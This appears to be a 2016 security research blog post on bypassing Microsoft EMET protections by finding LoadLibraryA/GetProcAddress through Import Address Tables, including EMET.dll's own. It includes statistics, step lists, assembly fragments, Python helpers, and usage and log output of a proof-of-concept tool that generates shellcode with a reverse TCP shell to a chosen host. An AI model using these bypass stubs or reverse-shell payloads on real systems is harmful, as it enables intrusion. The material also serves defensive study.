The EMET Serendipity: EMET's (In)Effectiveness Against Non-Exploitation Uses
TL;DR
This post discusses a method of bypassing Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections once Address Space Layout Randomization and Data Execution Prevention (ASLR/DEP) have been bypassed. The closer your position-independent shellcode is to working like compiled code, the harder it will be to stop with bolt-on user-land protections. DEP/ASLR/SEH are still solid protections; the additional protections mostly stop people who can't write their own payloads. Publication of this post was accelerated by a recent FireEye blog post that discusses these techniques in use.
Introduction
You might think: “EMET is made for exploit mitigation.” And you’re right, but its presence has been felt outside the exploitation arena. It shows up wherever users run position-independent shellcode where compiled code would work, or where Metasploit-sourced shellcode is typically used. Am I saying that EMET was written to stop Metasploit-sourced shellcode? Yup. Pretty much. Outside of the DEP/ASLR protections, which are not exclusive to EMET, all the other protections can be bypassed if you can get past DEP. This is nothing new. Many blog posts and papers have discussed this subject; here are a few of my favorites (1, 2, 3, 4).
Problem Solving
I started down this path about two years ago when working on the Backdoor Factory (BDF). I was originally using Metasploit payloads in BDF, but there was a concern: if a user trusted one of the patched executables, they could add it to their EMET-protected applications. At that point, the caller and Export Address Table Filtering (EAF) protections would flag the binary during execution. This happens because the Metasploit stub resolves each API by walking the export table and then reaches it via a JMP instruction (see Stephen Fewer’s Hash API Lookup Function). As you probably figured out, DEP and ASLR are not a concern when adding payloads to binaries because you can predict where you are with relative ease via relative virtual address (RVA) offsets. I ran across the Bromium Bypassing EMET 4.1 paper and decided to use the Import Table thunks instead of the Kernel32 export table to find a stable way to call LoadLibraryA (LLA) and GetProcAddress (GPA) while bypassing the EMET caller and EAF checks. This worked for binaries that had these APIs in their Import Address Table (IAT). About a year ago, I added Import Table patching to BDF: I would add a new section to the PE file, add the new API imports in a ‘new’ Import Directory, and point to the existing APIs in the old IAT. That solved the missing-API problem.
Around November 2014, I used this technique in exploitation, after an info leak and a DEP and ASLR bypass. I thought, “Why not go from the Process Environment Block (PEB) to the loaded module, find the IAT, then find LLA/GPA and load all the APIs from there?” It actually worked well. I'm not the first to do it; the best example of this, though non-working, was in Phrack issue 63 (2005-05-08). If you want to go to an even earlier example, see this (03-Nov-2004). So, I wrote a version of this and tested it against EMET with DEP disabled in the EMET graphical user interface (GUI) for the tested app, and it bypassed everything else. ASLR without DEP is nothing; the two are tied together, and if one falls so does the other. The technique is not a silver bullet for bypassing EMET. As I mentioned earlier, you still need an information leak and you will need to ROP your way to the shellcode. Those two things are exploit dependent, and I can find more exploits where this payload wouldn’t directly apply than where it would. So this shellcode sat unloved and alone in an unused Sublime Text tab.
Renewed Interest
Until February 2016, when Casey Smith (subTee) tweeted the following:
You might have heard of Casey Smith, aka subTee. He knows a bit about bypassing whitelisting protections.
We decided to collaborate on this project. I posted the IAT parsing shellcode and he had a go at it. We agreed that if you are able to get code execution without exploitation, you could call the WinAPIs directly and not even mess with shellcode. This includes Visual Basic for Applications (VBA), PowerShell, and even compiled code. Obvious is obvious. But what if you still wanted to use shellcode payloads because of their relatively small size? One problem was that PowerShell did not have LLA/GPA in its IAT. Casey came up with the idea of using the IAT of another DLL loaded in that memory space. That means loading the target binary in a debugger, viewing the DLLs loaded in that process's memory space, then checking each DLL for the APIs that you need. I, on the other hand, wanted to do this statically, and faster, so I decided to parse all system binaries (executables and DLLs), recursively map all the DLLs that each one loads into memory, and record whether any of them has LLA/GPA in its IAT. So, I created VMs for XPSP3, Vista, Win7, Win8.1, and Win10 and ran a Python script on each, enumerating the binaries and saving the output. I did not include WoW64 in the output, as the results should be similar to those for the x64 system32.
The number of system binaries (EXEs and DLLs) that have LLA/GPA in their IAT:
XPSP3: 1300/5426
VISTA: 645/26855
Win7: 675/48383
Win8: 324/31158
Win10: 225/50522
You see a huge drop in Vista, a slight uptick in the raw count in Win7 (though not in the proportion of binaries), then a steady drop in Win8 and Win10. Which is great. So this potential technique of finding LLA/GPA in an IAT should get harder. However, there is one DLL that is eventually loaded into the process space of many modern programs, and that is ADVAPI32.DLL. Have a look at its exposed APIs and you will understand why it's everywhere. And LLA/GPA is in its IAT. Good for us!
Thanks EMET
Let’s say in the target executable process space, there are no DLLs that have LLA or GPA in any of their IATs. However, if the process is protected by EMET, EMET.dll will be loaded into that process space. The EMET DLL has LLA/GPA in its import address table! The reason is to load dbghelp.dll and to execute the MiniDumpWriteDump API call!
So we have our POC and it works as follows:
Find PEB
Use part of Stephen Fewer’s API ROR function to compare just the DLL name to find the DLL we are looking for
Then find the IAT (like our IAT parser) and our associated APIs
With our parser, LLA and GPA API handles will be in EBX and ECX, respectively
By using this IAT parsing approach we defeat a couple of the protections included in HAVOC, the DLL!API hash-collision defense discussed in the most recent POC||GTFO (12.7). Although we hash just the DLL name, I found zero collisions among the DLL names in system32. I suppose someone could inject DLLs into the process space to cause collisions on the DLL name itself. But that would be more work, as you would need to cover every possible DLL name with LLA/GPA in its IAT that could be in the process space.
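The DLL-name comparison and the collision check described above can be sketched in Python. This is a minimal illustration, not the POC's code: it assumes a ROR13-style rolling hash over the upper-cased ASCII name with no terminator, and the exact byte handling in the real stub (Unicode names, null bytes) may differ. The function names `ror32`, `dll_name_hash`, and `find_collisions` are hypothetical.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by `bits` positions."""
    value &= 0xFFFFFFFF
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def dll_name_hash(name):
    """ROR13-style hash of a DLL name (assumed variant: upper-cased ASCII)."""
    h = 0
    for byte in name.upper().encode("ascii"):
        # Rotate the running hash, then add the next character.
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


def find_collisions(names):
    """Return {hash: [names]} for hashes shared by more than one distinct name."""
    buckets = {}
    for name in names:
        buckets.setdefault(dll_name_hash(name), set()).add(name.upper())
    return {h: sorted(group) for h, group in buckets.items() if len(group) > 1}


if __name__ == "__main__":
    sample = ["kernel32.dll", "ADVAPI32.dll", "emet.dll", "USER32.dll"]
    for dll in sample:
        print("%-14s 0x%08x" % (dll, dll_name_hash(dll)))
    print("collisions:", find_collisions(sample))
```

Feeding `find_collisions` the file names from a system32 directory listing is one way to repeat the zero-collision check for a given hash variant.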
Taking it one step further, we looked at the IAT footprint and how we could still use the IAT without both LLA and GPA present. We figured that only one API was needed, GPA, but we would need to bypass the EAF/caller checks if we worked off the export table of Kernel32. How can we do it? If you have GPA, you'll need the Kernel32 module handle to call GetProcAddress(Kernel32handle, "LoadLibraryA"). Afterwards you'll have the address of LoadLibraryA in EAX, and you can't call that address directly. Here is where understanding how the IAT works comes into the picture.
When you compile a modern Windows PE binary, an Import Table is created, and the API thunks are populated at binary load time. So, when the compiled code calls APIs off of the IAT, it's calling the address that the thunk points to. We need to do the same to beat the EMET caller protection.
Here’s how we did it:
Find PEB
Get the GPA API thunk address from the target DLL IAT
Use the PEB to get kernel32 via the kernel32 DLL hash
Use GPA to get the handle to LLA
Then implement a pointer to the LLA handle via the stack - LLA is in eax register
push eax ; Push LLA handle on the stack
mov ebx, esp ; Move the ptr to LLA on the stack in ebx
Now you can call LLA via `call dword ptr [ebx]`
If you look at the footprint of just GPA in system executables and DLLs you find the following:
XPSP3: 1999/5426
VISTA: 1512/26855
Win7: 1727/48383
Win8: 1164/31158
Win10: 843/50522
Again, a drop along the same lines as with both LLA/GPA, but you see that GPA is still prevalent in Windows 10.
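Because the total number of binaries differs so much between releases, the raw counts are easier to compare as proportions. The following sketch simply divides the figures from the two lists in this post; the dictionary and function names are illustrative only.

```python
# (hits, total binaries) copied from the two lists in this post.
LLA_AND_GPA = {
    "XPSP3": (1300, 5426),
    "VISTA": (645, 26855),
    "Win7": (675, 48383),
    "Win8": (324, 31158),
    "Win10": (225, 50522),
}
GPA_ONLY = {
    "XPSP3": (1999, 5426),
    "VISTA": (1512, 26855),
    "Win7": (1727, 48383),
    "Win8": (1164, 31158),
    "Win10": (843, 50522),
}


def percent(hits, total):
    """Share of binaries, as a percentage."""
    return 100.0 * hits / total


def share_table(counts):
    """Map each OS name to its percentage, rounded to two decimals."""
    return {name: round(percent(h, t), 2) for name, (h, t) in counts.items()}


if __name__ == "__main__":
    both = share_table(LLA_AND_GPA)
    gpa = share_table(GPA_ONLY)
    for name in LLA_AND_GPA:
        print("%-6s LLA/GPA: %6.2f%%   GPA only: %6.2f%%" % (name, both[name], gpa[name]))
```

By proportion, the LLA/GPA share falls with every release (roughly 24% on XPSP3 down to under 0.5% on Win10), while the GPA share on Win8 is marginally higher than on Win7 before dropping again on Win10.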
If I had to choose the workflow for a target binary, I would try the following in order:
Use the IAT of the main module for LLA/GPA
Use the GPA of the main module to find LLA
Use the IAT of a loaded module for LLA/GPA
Use the GPA of a loaded module to find LLA
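The ordering above can be expressed as a small selection function. This is a sketch of the decision logic only, not the POC's implementation: `pick_stub`, the strategy labels, and the input shapes (a list of imported API names for the main module, and a dict of DLL name to API names for loaded modules) are all assumptions made for illustration. Skipping KERNEL32.dll by default reflects the note later in this post that its IAT is avoided.

```python
LLA = "loadlibrarya"
GPA = "getprocaddress"


def pick_stub(main_imports, loaded_modules, skip=("kernel32.dll",)):
    """Return (strategy, dll_name) following the preference order in the post.

    main_imports:   API names found in the main module's IAT.
    loaded_modules: dict of DLL name -> API names found in that DLL's IAT.
    skip:           DLL names (lower case) never used as an IAT source.
    """
    main = {api.lower() for api in main_imports}
    # 1. Both APIs in the main module's IAT.
    if LLA in main and GPA in main:
        return ("main_iat_lla_gpa", None)
    # 2. Only GPA in the main module: resolve LLA through it.
    if GPA in main:
        return ("main_iat_gpa_only", None)

    candidates = {
        dll: {api.lower() for api in apis}
        for dll, apis in loaded_modules.items()
        if dll.lower() not in skip
    }
    # 3. Both APIs in some loaded module's IAT.
    for dll, apis in candidates.items():
        if LLA in apis and GPA in apis:
            return ("loaded_module_lla_gpa", dll)
    # 4. Only GPA in some loaded module's IAT.
    for dll, apis in candidates.items():
        if GPA in apis:
            return ("loaded_module_gpa_only", dll)
    return ("none", None)


if __name__ == "__main__":
    print(pick_stub(["CreateFileW"], {"ADVAPI32.dll": ["LoadLibraryA", "GetProcAddress"]}))
```

The returned DLL name is `None` for the two main-module strategies, since no other module has to be located through the PEB in those cases.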
I implemented this decision tree in a POC script. If necessary, it also parses the loaded modules' imports to find what will be loaded at runtime, and picks a DLL from that list whose IAT it can parse. The stubs can be taken and applied to other payloads that you care to write; just realize that the prototype puts LLA and GPA in EBX and ECX, respectively. And this is x86 only. Also, the stubs are paired with a reverse TCP cmd shell without an exit function, so it will crash after a successful connect back. This is by design (write your own).
The POC
Our POC covers all the system executables and DLLs in system32 that have LLA/GPA or just GPA in their IAT, for WinXP through Win10.
Usage:
Command line arguments explained:
PE_Binary: target executable you want to generate a payload for
HOST: Connect back IP
PORT: Connect back port
Operating system: pick one (winXP, winVista, win7, win8, win10)
Force_EMET_HASH: If LLA/GPA is not in the target executable IAT it will use them from EMET (True/False)
Force_Loaded_module: Force using a loaded module IAT for LLA/GPA vs the target exe IAT
Examples:
======
$ ./iat_poc.py handle.exe 127.0.0.1 8080 win8 False False
[*] Loading PE in pefile
[*] Parsing data directories
[*] Found API getprocaddress
[*] GetProcAddress API was found!
[*] DLLs in the import table: set(['ADVAPI32.dll', 'KERNEL32.dll', 'COMDLG32.dll', 'GDI32.dll', 'USER32.dll'])
[*] Using GPA IAT parsing stub
[*] Payload length: 489
[snip]
[output]
======
$ ./iat_poc.py handle.exe 127.0.0.1 8080 win10 False True
[*] Loading PE in pefile
[*] Parsing data directories
[*] Found API getprocaddress
[*] GetProcAddress API was found!
[*] DLLs in the import table: set(['ADVAPI32.dll', 'KERNEL32.dll', 'COMDLG32.dll', 'GDI32.dll', 'USER32.dll'])
[*] Checking win10 compatibility
[*] Number of lookups to do: 52270
[*] Checking for its imported DLLs: COMDLG32.dll
[*] COMDLG32.dll adds the following not already loaded dll: msvcrt.dll
[*] COMDLG32.dll adds the following not already loaded dll: ntdll.dll
[*] COMDLG32.dll adds the following not already loaded dll: SHLWAPI.dll
[*] COMDLG32.dll adds the following not already loaded dll: COMCTL32.dll
[*] COMDLG32.dll adds the following not already loaded dll: SHELL32.dll
[*] COMDLG32.dll adds the following not already loaded dll: FirewallAPI.dll
[*] COMDLG32.dll adds the following not already loaded dll: NETAPI32.dll
[*] Checking for its imported DLLs: emet.dll
[*] Checking for its imported DLLs: GDI32.dll
[*] Checking for its imported DLLs: KERNEL32.dll
[*] KERNEL32.dll adds the following not already loaded dll: KERNELBASE.dll
[*] Checking for its imported DLLs: ADVAPI32.dll
[*] ADVAPI32.dll adds the following not already loaded dll: SECHOST.dll
[*] ADVAPI32.dll adds the following not already loaded dll: RPCRT4.dll
[*] Checking for its imported DLLs: USER32.dll
[*] Checking for its imported DLLs: COMDLG32.dll
[*] Checking for its imported DLLs: KERNEL32.dll
[*] Checking for its imported DLLs: msvcrt.dll
[*] Checking for its imported DLLs: NETAPI32.dll
[*] Checking for its imported DLLs: ntdll.dll
[*] Checking for its imported DLLs: SHELL32.dll
[*] Checking for its imported DLLs: RPCRT4.dll
[*] RPCRT4.dll adds the following not already loaded dll: SspiCli.dll
[*] Checking for its imported DLLs: COMCTL32.dll
[*] Checking for its imported DLLs: FirewallAPI.dll
[*] Checking for its imported DLLs: emet.dll
[*] Checking for its imported DLLs: KERNELBASE.dll
[*] Checking for its imported DLLs: GDI32.dll
[*] Checking for its imported DLLs: ADVAPI32.dll
[*] Checking for its imported DLLs: SHLWAPI.dll
[*] Checking for its imported DLLs: SECHOST.dll
[*] Checking for its imported DLLs: USER32.dll
[*] Parsing imported dlls complete
[*] Possible useful loaded modules: set(['COMDLG32.dll', 'KERNEL32.dll', u'msvcrt.dll', u'NETAPI32.dll', u'RPCRT4.dll', u'SHELL32.dll', u'ntdll.dll', u'COMCTL32.dll', u'FirewallAPI.dll', 'emet.dll', u'KERNELBASE.dll', 'GDI32.dll', u'SspiCli.dll', 'ADVAPI32.dll', u'SHLWAPI.dll', u'SECHOST.dll', 'USER32.dll'])
[*] Looking for loadliba/getprocaddr or just getprocaddr in COMDLG32.dll
-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\comdlg32.dll
[*] Looking for loadliba/getprocaddr or just getprocaddr in KERNEL32.dll
[snip]
The output is a raw shellcode binary written to disk and a Python-formatted byte string written to stdout in the console. For those who are wondering, we avoid using the KERNEL32.dll IAT.
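The "adds the following not already loaded dll" lines in the second example come from walking the import graph until no new DLLs appear. A minimal sketch of that walk follows, written in Python 3 with a hand-written dictionary standing in for the import tables that the POC reads with pefile. The function name `resolve_loaded_modules` and the toy data are assumptions: the map lists only the DLLs the log reports as newly added, not real, complete import tables.

```python
from collections import deque

# Toy import map loosely based on the win10 log output above.
TOY_IMPORT_MAP = {
    "COMDLG32.dll": ["msvcrt.dll", "ntdll.dll", "SHLWAPI.dll", "COMCTL32.dll",
                     "SHELL32.dll", "FirewallAPI.dll", "NETAPI32.dll"],
    "KERNEL32.dll": ["KERNELBASE.dll"],
    "ADVAPI32.dll": ["SECHOST.dll", "RPCRT4.dll"],
    "RPCRT4.dll": ["SspiCli.dll"],
}

# Import table of the target, plus emet.dll, which is loaded into
# EMET-protected processes.
DIRECT_IMPORTS = ["ADVAPI32.dll", "KERNEL32.dll", "COMDLG32.dll",
                  "GDI32.dll", "USER32.dll", "emet.dll"]


def resolve_loaded_modules(direct_imports, import_map):
    """Breadth-first walk of the import graph.

    Returns DLL names in discovery order. Names are compared case-insensitively,
    and each DLL is visited once, so circular imports terminate.
    """
    lookup = {name.lower(): deps for name, deps in import_map.items()}
    seen = {}  # lower-case name -> name as first encountered
    queue = deque(direct_imports)
    while queue:
        dll = queue.popleft()
        key = dll.lower()
        if key in seen:
            continue
        seen[key] = dll
        for dep in lookup.get(key, ()):
            if dep.lower() not in seen:
                queue.append(dep)
    return list(seen.values())


if __name__ == "__main__":
    for name in resolve_loaded_modules(DIRECT_IMPORTS, TOY_IMPORT_MAP):
        print(name)
```

Each DLL in the resulting list is then a candidate whose IAT can be checked for LLA/GPA or for GPA alone.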
In Closing
We were planning on submitting these ideas to a security conference, but after the FireEye report of the Angler Exploit Kit abusing these concepts, we felt that ship had sailed. EMET has raised the level of effort for exploit development by ending the days of copy-and-paste exploit writing. However, if the exploit conditions are right, it is only a speed bump to those who can write their own shellcode and get that shellcode closer to compiled code. For example, Casey was able to bypass EMET protections in Excel and PowerShell using these techniques while deploying shellcode in his crafted whitelisting attacks. We have provided enough information for those who want to take our shellcode stubs in the POC and build out their own payloads.
If you want to create a HAVOC-like protection against just the GPA method of LLA resolution, you would need to inject a DLL into the process space, as the first loaded module, whose name collides with the kernel32 hash itself. Again, enumerating all possible DLLs with LLA/GPA in the process space could be difficult, though not impossible, because of unknown DLLs shipped with programs that might have these two APIs.